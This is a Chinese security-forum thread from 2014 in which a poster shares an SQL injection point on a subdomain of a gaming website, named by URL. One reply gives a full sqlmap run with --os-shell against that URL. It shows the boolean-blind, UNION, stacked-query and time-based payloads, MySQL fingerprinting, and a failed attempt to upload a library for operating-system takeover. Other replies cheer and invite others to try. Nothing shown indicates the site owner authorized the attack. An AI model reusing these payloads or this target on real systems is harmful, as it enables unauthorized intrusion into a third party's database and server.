楼主: 凡火火。

游戏风云某分站注入点一枚

  [复制链接]

该用户从未签到

发表于 2014-11-15 11:42:57 | 显示全部楼层
嗯,不错vuo      
回复 支持 反对

使用道具 举报

  • TA的每日心情
    无聊
    2017-8-21 19:56
  • 签到天数: 73 天

    [LV.6]常住居民II

    发表于 2014-11-15 12:15:38 | 显示全部楼层
    怎么厉害= =!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2014-11-15 12:19:30 | 显示全部楼层
    是不是发错板块了?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2017-8-21 19:56
  • 签到天数: 73 天

    [LV.6]常住居民II

    发表于 2014-11-15 12:38:55 | 显示全部楼层
    不是root拿J8

    root@kali:~# sqlmap -u http://ls.gamefy.cn/detail.php?id=13 --os-shell

        sqlmap/1.0-dev - automatic SQL injection and database takeover tool
        http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 12:40:57

    [12:40:58] [INFO] resuming back-end DBMS 'mysql'
    [12:40:58] [INFO] testing connection to the target URL
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=13 AND 4788=4788

        Type: UNION query
        Title: MySQL UNION query (NULL) - 19 columns
        Payload: id=-4963 UNION ALL SELECT 48,48,48,48,48,48,48,48,48,CONCAT(0x7162676f71,0x414144674654756a6c51,0x71666c6c71),48,48,48,48,48,48,48,48,48#

        Type: stacked queries
        Title: MySQL > 5.0.11 stacked queries
        Payload: id=13; SELECT SLEEP(5)--

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=13 AND SLEEP(5)
    ---
    [12:40:58] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL 5.0.11
    [12:40:58] [INFO] fingerprinting the back-end DBMS operating system
    [12:40:58] [INFO] the back-end DBMS operating system is Linux
    [12:40:58] [WARNING] time-based comparison requires larger statistical model, please wait..............................
    [12:41:03] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
    [12:41:04] [INFO] testing if current user is DBA
    [12:41:04] [INFO] fetching current user
    [12:41:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [12:41:04] [WARNING] functionality requested probably does not work because the curent session user is not a database administrator
    what is the back-end database management system architecture?
    [1] 32-bit (default)
    [2] 64-bit
    >
    [12:41:07] [INFO] checking if UDF 'sys_eval' already exist
    [12:41:08] [INFO] checking if UDF 'sys_exec' already exist
    [12:41:08] [INFO] detecting back-end DBMS version from its banner
    [12:41:08] [INFO] retrieving MySQL base directory absolute path
    [12:41:14] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
    [12:41:14] [ERROR] there has been a problem uploading the shared library, it looks like the binary file has not been written on the database underlying file system
    do you want to proceed anyway? Beware that the operating system takeover will fail [y/N]
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2017-6-1 14:33
  • 签到天数: 97 天

    [LV.6]常住居民II

    发表于 2014-11-15 12:54:24 | 显示全部楼层
    看看怎么突破的
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2018-8-22 12:07
  • 签到天数: 17 天

    [LV.4]偶尔看看III

    发表于 2014-11-15 12:55:51 | 显示全部楼层
    evil,支持啊。。。
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-11-15 13:55:12 | 显示全部楼层
    看看注入点。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-8-10 19:40
  • 签到天数: 33 天

    [LV.5]常住居民I

    发表于 2014-11-15 14:00:50 | 显示全部楼层
    赶紧来试试
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-11-15 14:03:40 | 显示全部楼层
    支持,顶楼主
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-1-5 19:19
  • 签到天数: 238 天

    [LV.7]常住居民III

    发表于 2014-11-15 14:47:58 | 显示全部楼层
    不会连DB权限都木有吧
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-4 01:25 , Processed in 0.020840 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部